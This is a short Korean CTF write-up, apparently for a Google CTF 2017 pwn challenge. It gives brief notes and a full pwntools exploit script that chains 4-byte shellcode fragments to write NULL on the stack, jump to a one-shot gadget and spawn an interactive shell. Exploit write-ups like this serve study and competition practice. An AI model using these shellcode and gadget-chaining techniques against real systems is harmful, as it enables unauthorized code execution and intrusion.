shellocode를 4바이트만큼 실행시켜주는데
주요 레지스터들을 초기화 시켜준다
그래서 r14를 이용해서 rsp+0x50에 NULL을 넣어주고
one_shot gadget을 이용해서 쉘을 땃다
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | # !/usr/bin/env python # powerprove from pwn import * s = remote("localhost", 4000) raw_input("googlectf 2017") context.arch = "amd64" shellcode = "\x90"*100 shellcode += asm(shellcraft.amd64.linux.sh()) if __name__ == "__main__": log.info("making rsp+0x30 = NULL") payload = "" payload += "\x49\x89\xE6\xC3" # mov r14, rsp ; ret payload += "\x4D\x01\xD6\xC3" # add r14, r10 ; ret payload += "\x4D\x01\xD6\xC3" # add r14, r10 ; ret payload += "\x49\xFF\xC6\xC3"*0xc # inc r14 ; ret payload += "\x4D\x89\x3E\x90" # mov QWORD PTR [r14],r15 ; ret log.info("making one_shot") payload += "\x4C\x8B\x75\x18" # mov r14, [rbp + 0x10] payload += "\x4D\x01\xD6\x90"*6 # add r14, r10 ; ret payload += "\x49\xFF\xC6\x90"*3 # inc r14 payload += "\x4D\x01\xDE\xC3"*4 # add r14, r11 ; ret payload += "\x4D\x01\xD6\xC3"*8 # add r14, r10 ; ret payload += "\x49\xFF\xC6\xC3"*0x1c # inc r14 ; ret payload += "\x41\xFF\xD6\xC3" s.send(payload) s.interactive() | cs |
'CTF > 2017' 카테고리의 다른 글
| [0CTF EasiestPrintf] write up (0) | 2017.06.30 |
|---|---|
| [plaid ctf 2017] bigpicture (0) | 2017.06.29 |
| [codegate 2017 final] owner (0) | 2017.06.26 |
| codegate_final 2017 real (0) | 2017.06.23 |
| 허스트 CTF pwn write up (0) | 2017.05.31 |
powerprove